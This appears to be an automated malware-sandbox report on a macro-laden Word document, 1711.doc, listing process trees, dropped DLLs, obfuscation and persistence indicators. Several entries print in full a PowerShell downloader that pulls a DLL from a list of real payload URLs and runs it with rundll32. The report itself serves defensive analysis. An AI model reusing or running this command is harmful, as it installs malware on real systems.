Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00681C10	16_2_00681C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067E21C	16_2_0067E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068AEEB	16_2_0068AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068ECE3	16_2_0068ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006730F6	16_2_006730F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068A8F0	16_2_0068A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068DEF4	16_2_0068DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068BEC9	16_2_0068BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00680ADE	16_2_00680ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006908D1	16_2_006908D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00687ED1	16_2_00687ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068CCD4	16_2_0068CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006844AA	16_2_006844AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067FEA0	16_2_0067FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067DAAE	16_2_0067DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006878A5	16_2_006878A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D6A7	16_2_0068D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006890BA	16_2_006890BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00675AB2	16_2_00675AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006898BD	16_2_006898BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684E8A	16_2_00684E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068748A	16_2_0068748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00677283	16_2_00677283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067CC8D	16_2_0067CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00690687	16_2_00690687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067AC95	16_2_0067AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068AC9B	16_2_0068AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673C91	16_2_00673C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D091	16_2_0068D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068056A	16_2_0068056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00681F6B	16_2_00681F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068577E	16_2_0068577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673345	16_2_00673345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068F14D	16_2_0068F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691343	16_2_00691343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673F5C	16_2_00673F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067C158	16_2_0067C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0069292B	16_2_0069292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00676B25	16_2_00676B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00675923	16_2_00675923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00690B34	16_2_00690B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673502	16_2_00673502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672309	16_2_00672309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068FD10	16_2_0068FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067251C	16_2_0067251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068BFE8	16_2_0068BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006755E8	16_2_006755E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006903F1	16_2_006903F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067C5FE	16_2_0067C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00676FC4	16_2_00676FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006925C3	16_2_006925C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067A3DF	16_2_0067A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684BAA	16_2_00684BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00689DA1	16_2_00689DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00682FA2	16_2_00682FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067BFB6	16_2_0067BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00687BB2	16_2_00687BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068B1B5	16_2_0068B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679384	16_2_00679384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684D8D	16_2_00684D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067758F	16_2_0067758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00674F8E	16_2_00674F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D99A	16_2_0068D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067FD91	16_2_0067FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691193	16_2_00691193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068B397	16_2_0068B397

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Tries to load missing DLLs

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Yara signature match

Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, type: DROPPED

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 615B5BE0 appears 49 times

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 1711.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open	Name: Document_Open
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A13F0 zwxnlwalmcbgmt,

14_2_615A13F0

Document contains no OLE stream with summary information

Source: 1711.doc	OLE indicator has summary info: false
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator has summary info: false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE indicator has summary info: false

Document contains embedded VBA macros

Source: 1711.doc	OLE indicator, VBA macros: true
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator, VBA macros: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@27/26@2/24

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615AEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

14_2_615AEBD0

Source: 1711.doc	OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: 1711.doc	Virustotal: Detection: 39%
Source: 1711.doc	Metadefender: Detection: 20%
Source: 1711.doc	ReversingLabs: Detection: 57%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{E3FF1F0A-4208-4AB1-BD02-5AC59AFBF013} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615ABC70 SHGetFolderPathW,CoCreateInstance,

14_2_615ABC70

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_01

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior

Obfuscated command line found

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046E12A1 push es; ret	5_2_046E12B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D8067 push ecx; ret	14_2_615D807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5C26 push ecx; ret	14_2_615B5C39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671229 push eax; retf	16_2_0067129A

PE file contains an invalid checksum

Source: 13791789.dll.5.dr

Static PE information: real checksum: 0x81586 should be: 0x7d179

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\13791789.dll

Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\13791789.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)			Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk:Zone.Identifier read attributes | delete

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\SysWOW64\rundll32.exe

14_2_615B7C47

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\svchost.exe

